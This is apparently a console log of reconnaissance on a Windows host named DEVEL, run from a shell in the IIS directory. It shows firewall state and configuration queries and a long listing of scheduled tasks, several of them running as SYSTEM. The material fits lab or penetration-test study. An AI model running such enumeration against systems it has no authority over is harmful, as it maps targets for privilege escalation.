c:\windows\system32\inetsrv>netsh firewall show state
netsh firewall show state

Firewall status:
-------------------------------------------------------------------
Profile                           = Standard
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable
Group policy version              = Windows Firewall
Remote admin mode                 = Disable

Ports currently open on all network interfaces:
Port   Protocol  Version  Program
-------------------------------------------------------------------
No ports are currently open on all network interfaces.

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .



c:\windows\system32\inetsrv> netsh firewall show config
 netsh firewall show config

Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable

Allowed programs configuration for Domain profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------

Port configuration for Domain profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------

ICMP configuration for Domain profile:
Mode     Type  Description
-------------------------------------------------------------------
Enable   2     Allow outbound packet too big

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable

Service configuration for Standard profile:
Mode     Customized  Name
-------------------------------------------------------------------
Enable   No          Network Discovery

Allowed programs configuration for Standard profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------

Port configuration for Standard profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------

ICMP configuration for Standard profile:
Mode     Type  Description
-------------------------------------------------------------------
Enable   2     Allow outbound packet too big

Log configuration:
-------------------------------------------------------------------
File location   = C:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size   = 4096 KB
Dropped packets = Disable
Connections     = Disable

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .

Investigate Running Services

c:\windows\system32\inetsrv>schtasks /query /fo LIST /v
schtasks /query /fo LIST /v

Folder: \
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft\Windows
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft\Windows\Active Directory Rights Management Services Client
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated)
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if authentication to the template distribution web service on the server fails. In this case, it fails silently.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Everyone
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           3:00:00
Start Date:                           9/11/2006
End Date:                             N/A
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated)
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if authentication to the template distribution web service on the server fails. In this case, it fails silently.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Everyone
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual)
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Updates the AD RMS rights policy templates for the user. This job provides a credential prompt if authentication to the template distribution web service on the server fails.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Everyone
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Autochk
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Autochk\Proxy
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:21:07
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations
Start In:                             N/A
Comment:                              This task collects and uploads autochk SQM data if opted-in to the Microsoft Customer Experience Improvement Program.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 525600 minutes
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Customer Experience Improvement Program
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Customer Experience Improvement Program\Consolidator
Next Run Time:                        14/9/2019 8:00:00
Status:                               Could not start
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 2:00:00
Last Result:                          -2147479295
Author:                               Microsoft Corporation
Task To Run:                          %SystemRoot%\System32\wsqmcons.exe
Start In:                             N/A
Comment:                              If the user has consented to participate in the Windows Customer Experience Improvement Program, this job collects and sends usage data to Microsoft.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only, Hourly
Start Time:                           12:00:00
Start Date:                           2/1/2004
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        19 Hour(s), 0 Minute(s)
Repeat: Until: Time:                  None
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask
Next Run Time:                        19/9/2019 3:30:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              The Kernel CEIP (Customer Experience Improvement Program) task collects additional information about the system and sends this data to Microsoft.  If the user has not consented to participate in Windows CEIP, this task does nothing.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 3 minutes, If Not Idle Retry For 1020 minutes
Power Management:                     No Start On Batteries
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           3:30:00
Start Date:                           1/9/2008
End Date:                             N/A
Days:                                 THU
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Customer Experience Improvement Program\UsbCeip
Next Run Time:                        16/9/2019 1:30:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 5:57:06
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              The USB CEIP (Customer Experience Improvement Program) task collects Universal Serial Bus related statistics and information about your machine and sends it to the Windows Device Connectivity engineering group at Microsoft.  The information received is
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           1:30:00
Start Date:                           25/4/2008
End Date:                             N/A
Days:                                 Every 3 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Defrag
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Defrag\ScheduledDefrag
Next Run Time:                        18/9/2019 1:38:42
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\defrag.exe -c
Start In:                             N/A
Comment:                              This task defragments the computers hard disk drives.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 3 minutes, If Not Idle Retry For 10080 minutes Stop the task if Idle State end
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2005
End Date:                             N/A
Days:                                 WED
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Diagnosis
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Diagnosis\Scheduled
Next Run Time:                        15/9/2019 1:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        17/3/2017 5:45:40
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              The Windows Scheduled Maintenance Task performs periodic maintenance of the computer system by fixing problems automatically or reporting them through the Action Center.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 480 minutes
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          INTERACTIVE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2004
End Date:                             N/A
Days:                                 SUN
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\DiskDiagnostic
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector
Next Run Time:                        22/9/2019 1:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 5:57:06
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART
Start In:                             N/A
Comment:                              The Windows Disk Diagnostic reports general disk and system information to Microsoft for users participating in the Customer Experience Program.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for  minutes, If Not Idle Retry For  minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2004
End Date:                             N/A
Days:                                 SUN
Months:                               Every 2 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\DFDWiz.exe
Start In:                             N/A
Comment:                              The Microsoft-Windows-DiskDiagnosticResolver warns users about faults reported by hard disks that support the Self Monitoring and Reporting Technology (S.M.A.R.T.) standard. This task is triggered automatically by the Diagnostic Policy Service when a S.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Location
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Location\Notifications
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %windir%\System32\LocationNotifications.exe
Start In:                             N/A
Comment:                              Location Activity
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Maintenance
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Maintenance\WinSAT
Next Run Time:                        15/9/2019 1:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        17/3/2017 11:49:04
Last Result:                          0
Author:                               Microsoft
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Measures a system's performance and capabilities
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for  minutes, If Not Idle Retry For  minutes Stop the task if Idle State end
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Administrators
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2008
End Date:                             N/A
Days:                                 SUN
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Media Center
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ActivateWindowsSearch
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoActivateWindowsSearch
Start In:                             N/A
Comment:                              Privileged Media Center Search Reindexing job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ConfigureInternetTimeService
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoConfigureInternetTimeService
Start In:                             N/A
Comment:                              Privileged Media Center Time Update Service setting job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\DispatchRecoveryTasks
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center Recovery Task Dispatcher job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ehDRMInit
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DRMInit
Start In:                             N/A
Comment:                              Privileged Media Center DRM initialization job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\InstallPlayReady
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center PlayReady install job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\mcupdate
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\mcupdate $(Arg0)
Start In:                             N/A
Comment:                              Check for Media Center updates.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\MediaCenterRecoveryTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform Media Center Recovery activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform Object Store Recovery activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\OCURActivate
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /OCURActivate
Start In:                             N/A
Comment:                              Privileged Media Center OCUR activation job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\OCURDiscovery
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center OCUR discovery job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PBDADiscovery
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /PBDADiscovery
Start In:                             N/A
Comment:                              Privileged Media Center OCUR discovery job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PBDADiscoveryW1
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery
Start In:                             N/A
Comment:                              Privileged Media Center OCUR discovery job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PBDADiscoveryW2
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery
Start In:                             N/A
Comment:                              Privileged Media Center OCUR discovery job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PeriodicScanRetry
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %windir%\ehome\MCUpdate.exe -pscn 0
Start In:                             N/A
Comment:                              Background periodic scanner - PeriodicScanRetry
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only
Start Time:                           5:33:00
Start Date:                           9/9/2006
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PvrRecoveryTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform Pvr Recovery activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PvrScheduleTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform PVR Scheduling activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
